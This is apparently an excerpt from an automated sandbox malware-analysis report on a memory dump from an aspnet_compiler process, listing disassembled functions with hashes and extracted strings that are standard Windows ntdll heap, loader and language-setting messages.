HEAP: , xrefs: 00FC03A6, 00FC04B5, 00FC05DD, 00FC0682, 00FC06D9

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap$ribeWnfStateChange
API String ID: 0-1586946365
Opcode ID: f710a33d6d8e4a122c7eaa187e6a597a001e72f5152b00c5e9f6876b65437098
Instruction ID: b92f0a6f8897d0178d8f4d8b524deaa120b12a21f9aefe937bc8a1aa93c0e811
Opcode Fuzzy Hash: f710a33d6d8e4a122c7eaa187e6a597a001e72f5152b00c5e9f6876b65437098
Instruction Fuzzy Hash: 58D1AE31900686DFCB26DF68C942BADBBF1FF49714F08805DE5459B292CB39D942EB14

Function 00F0D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

PreferredUILanguagesPending, xrefs: 00F6A8DE
Control Panel\Desktop, xrefs: 00F0D45D
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 00F0D3B6
Control Panel\Desktop\MuiCached, xrefs: 00F0D62B
@, xrefs: 00F0D3E9
MachinePreferredUILanguages, xrefs: 00F0D685
PreferredUILanguages, xrefs: 00F0D4B8, 00F0D4C5
@, xrefs: 00F0D663
@, xrefs: 00F0D49D

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 5022500c7885e7b05b05de27c4ece168fd7effa636f33687f3d15f4873011ffa
Instruction ID: 5ad10fcd05a227cc5e792131bbb3a82342068a8f896898eb3791b16166675754
Opcode Fuzzy Hash: 5022500c7885e7b05b05de27c4ece168fd7effa636f33687f3d15f4873011ffa
Instruction Fuzzy Hash: D9B18E729083559FC721DF64C840B6BB7E8AF88764F05492EF989E7280D734DD48EB92

Function 00FA9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

AppContainerNamedObjects, xrefs: 00FA946E, 00FA94D6
\Sessions, xrefs: 00FA9488
%s\%u-%u-%u-%u, xrefs: 00FA9422
\AppContainerNamedObjects, xrefs: 00FA94AB, 00FA94B9
Global\Session\%ld%s, xrefs: 00FA94C5
%s\%ld\%s, xrefs: 00FA948D
BaseNamedObjects, xrefs: 00FA9477, 00FA947C
\BaseNamedObjects, xrefs: 00FA949E

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: 3add7d1d76aaeb2a7d858f0cb0b5de0923eae7c41467feda884b7e8ee383c93f
Instruction ID: 0309d63049691fda0e8ac7c550e9d45d7c8b2d0770d9e864ef58fb638ba9fec2
Opcode Fuzzy Hash: 3add7d1d76aaeb2a7d858f0cb0b5de0923eae7c41467feda884b7e8ee383c93f
Instruction Fuzzy Hash: CFD1E4F280C315AFD721DA54C842B6BB7E8AFC5724F044939FE84A7251D7B8DD08A792

Function 00F0D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 00F0D313
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 00F0D262
@, xrefs: 00F0D2AF
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 00F0D0CF
@, xrefs: 00F0D0FD
Control Panel\Desktop\LanguageConfiguration, xrefs: 00F0D196
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 00F0D2C3
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 00F0D146

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 381857e96678439481e80faed0cc2d32a9c63a8c61303d9c33493d00009a30f4
Instruction ID: f2bffeee62603b910d677ffa64f82605e158a0cef999ecaf1aa67d1b5acdbede
Opcode Fuzzy Hash: 381857e96678439481e80faed0cc2d32a9c63a8c61303d9c33493d00009a30f4
Instruction Fuzzy Hash: CDA17D719083459FE721DF64C941B5BB7E8BB84725F00492EFA88A7281D778D908EF53

Function 00F3F5B0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 382COMMON

Download Yara Rule

Strings

cribeWnfStateChange, xrefs: 00F801EE
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00F802BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00F802E7
RTL: Re-Waiting, xrefs: 00F8031E

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting$cribeWnfStateChange
API String ID: 0-2060834851
Opcode ID: 6ef62bb57420802e515ae312ba63777682e0304f6347fa01440a49698648aa39
Instruction ID: 4165f5cd024500c8515bee6de8da0a730c02f1437900cb103e4767f062093f2e
Opcode Fuzzy Hash: 6ef62bb57420802e515ae312ba63777682e0304f6347fa01440a49698648aa39
Instruction Fuzzy Hash: 33E1DF31A047419FD725DF28C885B6AB7E0BF85334F240A6DF5A58B2E1DB74D848EB42

Function 00F2B1B0 Relevance: 9.1, Strings: 7, Instructions: 350COMMON

Download Yara Rule

Strings

SxS, xrefs: 00F783ED
ribeWnfStateChange, xrefs: 00F2B286, 00F2B3D5, 00F783FA
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 00F784D0
DLL %wZ was redirected to %wZ by %s, xrefs: 00F783FC
minkernel\ntdll\ldrutil.c, xrefs: 00F7840D, 00F784E1
LdrpPreprocessDllName, xrefs: 00F78403, 00F784D7
API set, xrefs: 00F783F4, 00F783F9

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c$ribeWnfStateChange
API String ID: 0-1834356054
Opcode ID: 02d3d7a962943e8c78106069ee76b47b45ac68f22ef46e9032f7916f6d491182
Instruction ID: 626bc43cfcf7c39613778116e0caaca86f1bff860f78f4adca6398d522f214b4
Opcode Fuzzy Hash: 02d3d7a962943e8c78106069ee76b47b45ac68f22ef46e9032f7916f6d491182
Instruction Fuzzy Hash: 25C15831E002259BCB25DF64DC95BBE7765AF44720F14816AEC06AB2C2DBB4CD45F391

Function 00FBF525 Relevance: 9.0, Strings: 7, Instructions: 231COMMON

Download Yara Rule

Strings

Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 00FBF7BE
ribeWnfStateChange, xrefs: 00FBF540, 00FBF5FF
HEAP[%wZ]: , xrefs: 00FBF6E7, 00FBF794, 00FBF7EB
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 00FBF809
RtlAllocateHeap, xrefs: 00FBF56D
Just allocated block at %p for %Ix bytes, xrefs: 00FBF708
HEAP: , xrefs: 00FBF6F4, 00FBF7A1, 00FBF7F8

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap$ribeWnfStateChange
API String ID: 0-3182173713
Opcode ID: 3e391111c274c35d1cf0f0d7e246473742d4fe4735b7870b25c7a7ede8624592
Instruction ID: 388ab09e1d2750e02fdb0a6bd0adc8a0fa3a91f798b4c9ad046ed6def71879fb
Opcode Fuzzy Hash: 3e391111c274c35d1cf0f0d7e246473742d4fe4735b7870b25c7a7ede8624592
Instruction Fuzzy Hash: EA91E132900645DFCB22DF6AC841AEDBBF2FF49714F14406DE545AB2A2CB399944EF14

Function 00F0645D Relevance: 8.9, Strings: 7, Instructions: 150COMMON

Download Yara Rule

Strings

ribeWnfStateChange, xrefs: 00F064A8
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00F69A2A
minkernel\ntdll\ldrinit.c, xrefs: 00F69A11, 00F69A3A
LdrpInitShimEngine, xrefs: 00F699F4, 00F69A07, 00F69A30
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00F699ED
Getting the shim engine exports failed with status 0x%08lx, xrefs: 00F69A01
apphelp.dll, xrefs: 00F06496

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c$ribeWnfStateChange
API String ID: 0-576085027
Opcode ID: 67e0fdbf29f2e8a9194b13c90c58cc24b665a1e1b011893703b0d779f53cc4ee
Instruction ID: 3eff2e7f8a80da3604457ad51cb30492a411878e06abf61254b97e17b82c3997
Opcode Fuzzy Hash: 67e0fdbf29f2e8a9194b13c90c58cc24b665a1e1b011893703b0d779f53cc4ee
Instruction Fuzzy Hash: 3E51DE712483049FD321EF60DC42BAB77E8FB84754F14091EF985AB191D778E904EB92

Function 00F0F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(UCRBlock != NULL), xrefs: 00F6DF6F
(LONG)FreeEntry->Size > 1, xrefs: 00F6E291
HEAP[%wZ]: , xrefs: 00F6DF57, 00F6E09B, 00F6E279, 00F6E391
(!TrailingUCR), xrefs: 00F6E3A9
HEAP: , xrefs: 00F6DF64, 00F6E0A8, 00F6E286, 00F6E39E
((LONG)FreeEntry->Size > 1), xrefs: 00F6E0B3

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 09c5e413ccd68579cb5d7dfb7c9b1961b126f83c8bb52af3dd97e780118d1093
Instruction ID: c704fb909136b07746284245f1fc649b5e107019572b99ab0e3d8ba45b665b11
Opcode Fuzzy Hash: 09c5e413ccd68579cb5d7dfb7c9b1961b126f83c8bb52af3dd97e780118d1093
Instruction Fuzzy Hash: 5C42D076A043819FC725DF28C884B2ABBE5BF88314F18456DF4858B792D738D849FB52

Function 00F463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 00F841FE
Delaying execution failed with status 0x%08lx, xrefs: 00F84258
Process initialization failed with status 0x%08lx, xrefs: 00F8413A
minkernel\ntdll\ldrinit.c, xrefs: 00F840E9, 00F8414B, 00F8420F, 00F84269
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 00F840D8
_LdrpInitialize, xrefs: 00F840DF, 00F84141, 00F84205, 00F8425F

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 2bf19030fe24290bf04139cff03a4e55df258c48fcf686086f4cf35c3079fd6d
Instruction ID: a3a63b3892d893d86e4706efa9ad23863a4dbec727e8239c26b53b6d2b70e35d
Opcode Fuzzy Hash: 2bf19030fe24290bf04139cff03a4e55df258c48fcf686086f4cf35c3079fd6d
Instruction Fuzzy Hash: 35915931F00715DBEB36EF14DC49BAA7BA0BB42B24F14012AF944AB2D1D779A841F791

Function 00F270C0 Relevance: 7.2, Strings: 4, Instructions: 2248COMMON

Download Yara Rule

Strings

ribeWnfStateChange, xrefs: 00F27DAE
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00F27C96, 00F28696
HEAP[%wZ]: , xrefs: 00F27C6D, 00F28670
HEAP: , xrefs: 00F27C7C, 00F2867F

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]: $ribeWnfStateChange
API String ID: 0-966750867
Opcode ID: 36d70818c14a3517155538024206dc263e0f23625f4f2b722a060027815feaf9
Instruction ID: 4a8e2ee73c2aeb1eac1404d8ce8d5b2e36fd84a5c2e0040d67f0a009a4161859
Opcode Fuzzy Hash: 36d70818c14a3517155538024206dc263e0f23625f4f2b722a060027815feaf9
Instruction Fuzzy Hash: 5413AF70E05665CFDB24CF68D8907A9BBF1BF49314F248169D845AB381DB34AC46EF90

Function 00F351EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 00F3522A
Kernel-MUI-Language-Allowed, xrefs: 00F3527B
Kernel-MUI-Language-SKU, xrefs: 00F3542B
Kernel-MUI-Language-Disallowed, xrefs: 00F35352
Kernel-MUI-Number-Allowed, xrefs: 00F35247

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: a607dfcba4c1ee80c6936365510ca465de7a8192e85fd3cf5dc894725e989667
Instruction ID: 307d7d429a7b4b619d611c17cbb54ead3f7c14aae884404c77e412b24d99f666
Opcode Fuzzy Hash: a607dfcba4c1ee80c6936365510ca465de7a8192e85fd3cf5dc894725e989667
Instruction Fuzzy Hash: BAF15D72D00628EFCB15DF94C941AEEBBF9EF48B60F15406AE905B7211D7749E01EB90

Function 00F21070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 00F75877
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 00F7588F
@, xrefs: 00F75A53
HEAP: , xrefs: 00F75884

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: da1326ad0e2c901bda74f770c7b9a7448e027cb0966e455d0242c5f803901fb4
Instruction ID: 00beab1128a5dd6dd21e67c7017362bd5af06abcb5b97583cdfdc69bfa298571
Opcode Fuzzy Hash: da1326ad0e2c901bda74f770c7b9a7448e027cb0966e455d0242c5f803901fb4
Instruction Fuzzy Hash: 9C926971E01228CFEB24CF18DC41BA9B7B6BF54310F1581EAE949A7281D7749E80EF56

Function 00FB94E0 Relevance: 5.6, Strings: 4, Instructions: 558COMMON

Download Yara Rule

Strings

ribeWnfStateChange, xrefs: 00FB9578
0, xrefs: 00FB9BF6
, xrefs: 00FB9B84
, xrefs: 00FB9AD7

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: $ $0$ribeWnfStateChange
API String ID: 0-1435895387
Opcode ID: c1f9fdab9f239467854a4ec6bc172305bf2def396170eea6e577ece0aaf9a932
Instruction ID: 741247e41bd56351f7b887eed004de87e302a37a41087c75f5077cec88934b30
Opcode Fuzzy Hash: c1f9fdab9f239467854a4ec6bc172305bf2def396170eea6e577ece0aaf9a932
Instruction Fuzzy Hash: 9E3235B1A0C3818FD320CF69C884B9BBBE5BB88314F14492DF69987251D7B5E948DF52

Function 00F1A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 00F1A3E7
LdrResFallbackLangList Exit, xrefs: 00F1A3FF
6, xrefs: 00F1A3F7
LdrResFallbackLangList Enter, xrefs: 00F1A3EF

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 3f1bcd39aa8775abcf206100f800f3c0ed6202cb4fecd79aa68113273e81f024
Instruction ID: 32fbb5afe04fe3e7698672c45c5c348185a9a4e5ff879d1bb149a228c43a2082
Opcode Fuzzy Hash: 3f1bcd39aa8775abcf206100f800f3c0ed6202cb4fecd79aa68113273e81f024
Instruction Fuzzy Hash: A4C19D71509382CFC711CF58C540BAAB7E4BF84724F04896EF8958B261E778CA89EB53

Function 00F48402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F4855E
minkernel\ntdll\ldrinit.c, xrefs: 00F48421
@, xrefs: 00F48591
LdrpInitializeProcess, xrefs: 00F48422

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: c71524318ca3cb03b9c604b43bc2e275759c12c03c2a8055d6d9be109242aa3a
Instruction ID: 0bfa42350bfe155525e2db128683e50d0de05d66df0041d87dbf3b99ccd81339
Opcode Fuzzy Hash: c71524318ca3cb03b9c604b43bc2e275759c12c03c2a8055d6d9be109242aa3a
Instruction Fuzzy Hash: F2919D71508744AFD721EF21CC41FAFBBE8BF847A4F44092EFA8492151E738D945AB62

Function 00F1B440 Relevance: 5.2, Strings: 4, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Enter, xrefs: 00F1B465
\U, xrefs: 00F1B5E0
LdrpResGetResourceDirectory Exit, xrefs: 00F1B477
{, xrefs: 00F737B6

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\U${
API String ID: 0-2509056319
Opcode ID: 93a47a43325669b8f44ecca69255451563c4dd4240e96ada62a8beee587db168
Instruction ID: cb3121d6724bcb4f83811643e7c0f55f2040dad9bf6e63ffc431423b770758d1
Opcode Fuzzy Hash: 93a47a43325669b8f44ecca69255451563c4dd4240e96ada62a8beee587db168
Instruction Fuzzy Hash: 6391E172D04219CFDB25CF58C840BEDB7B1EF14324F288196E815AB291D3789E81EB91

Function 00F164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00F71028
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00F70FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00F7106B
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00F710AE

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 13307f2ea35a0de3e7728c28249f191f0477ebcd823a484eaebadee357ce2955
Instruction ID: 323cf7d1c9d2fbd82868eb1ad94ab0b9c00d0ef9098b81c67b4363d75cea41ee
Opcode Fuzzy Hash: 13307f2ea35a0de3e7728c28249f191f0477ebcd823a484eaebadee357ce2955
Instruction Fuzzy Hash: 5371EEB1904304AFCB20DF14CC85B9B7FA9AF84764F044569FD498B286D738D588EBD2

Function 00F315F4 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

ribeWnfStateChange, xrefs: 00F31644, 00F7A54D
minkernel\ntdll\ldrmap.c, xrefs: 00F7A59A
LdrpCompleteMapModule, xrefs: 00F7A590
Could not validate the crypto signature for DLL %wZ, xrefs: 00F7A589

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c$ribeWnfStateChange
API String ID: 0-44419829
Opcode ID: c834957104d983645707793144453ffec2e82eb2c1a4017bc62a8d3693a0ca9f
Instruction ID: b9e8f151401f822c322766d97cee5bebff1992e992502c5dad5f024266f0b656
Opcode Fuzzy Hash: c834957104d983645707793144453ffec2e82eb2c1a4017bc62a8d3693a0ca9f
Instruction Fuzzy Hash: 09513371A007449BDB21CBA8CD46B2A77E4BF40734F1D4169F9559B2E2D738ED00EB42

Function 00FC11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 00FC123D, 00FC12B7
This is located in the %s field of the heap header., xrefs: 00FC12D6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 00FC1261
HEAP: , xrefs: 00FC124A, 00FC125D, 00FC125F, 00FC12C4

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: df7d37072cc896b4791aeb8757499903a8359f2f7d273d375b16e39c0080fa99
Instruction ID: f401b83f9292769203eb739a51ab2955a38450a26d853bc360d5e9304b74998b
Opcode Fuzzy Hash: df7d37072cc896b4791aeb8757499903a8359f2f7d273d375b16e39c0080fa99
Instruction Fuzzy Hash: D431F336640245EFD720DB98CD86FA673E8FF06764F240059F501DB292D6349C54F665

Function 00F3245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 00F7A998
minkernel\ntdll\ldrinit.c, xrefs: 00F7A9A2
TG, xrefs: 00F32462
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00F7A992

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG$minkernel\ntdll\ldrinit.c
API String ID: 0-2078120800
Opcode ID: c5cfe964cabdcd6bc50146ebb450bcc29b2f27b279785a08a8139f7a52044226
Instruction ID: 4dad3b7297306fb1ae939b390518e33014353905ce345919832407c2f525d33c
Opcode Fuzzy Hash: c5cfe964cabdcd6bc50146ebb450bcc29b2f27b279785a08a8139f7a52044226
Instruction Fuzzy Hash: 74315B72A00301EBDB32DF58DC81A6EB7B5FBC4B24F16802AF9446B245C77A5D91E742

Function 00F09148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 00F6BAA0, 00F6BADD
VirtualProtect Failed 0x%p %x, xrefs: 00F6BABA
VirtualQuery Failed 0x%p %x, xrefs: 00F6BAF7
HEAP: , xrefs: 00F6BAAD, 00F6BAEA

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 2603f3e4d9c0473ab41e914b5c15b96b05d25db2ab0002929bb74efe1f5f1107
Instruction ID: 3762ca2c16f45891c4601ab693da39006b14d88af054b95d4bcbb1832a4fd1e1
Opcode Fuzzy Hash: 2603f3e4d9c0473ab41e914b5c15b96b05d25db2ab0002929bb74efe1f5f1107
Instruction Fuzzy Hash: 5F31B432A40219EFCB11DB85CC85FAAB7B9EF45770F144051F914A72D2E774ED80EA60

Function 00F11460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00F11728
HEAP[%wZ]: , xrefs: 00F11712
HEAP: , xrefs: 00F11596

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 08ec7894f3e336d6d31740cfbad56adf5730b5999030bf50500de05f5160d8d1
Instruction ID: 32227034d85b25db21702a5a7a8081a44edb902b2928c289734c1429cbf66983
Opcode Fuzzy Hash: 08ec7894f3e336d6d31740cfbad56adf5730b5999030bf50500de05f5160d8d1
Instruction Fuzzy Hash: F0E10631A046459FDB29CF28C4517BABBF2FF85310F18856DE696CB286D734E884EB50

Function 00F0A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 00F6C1E4
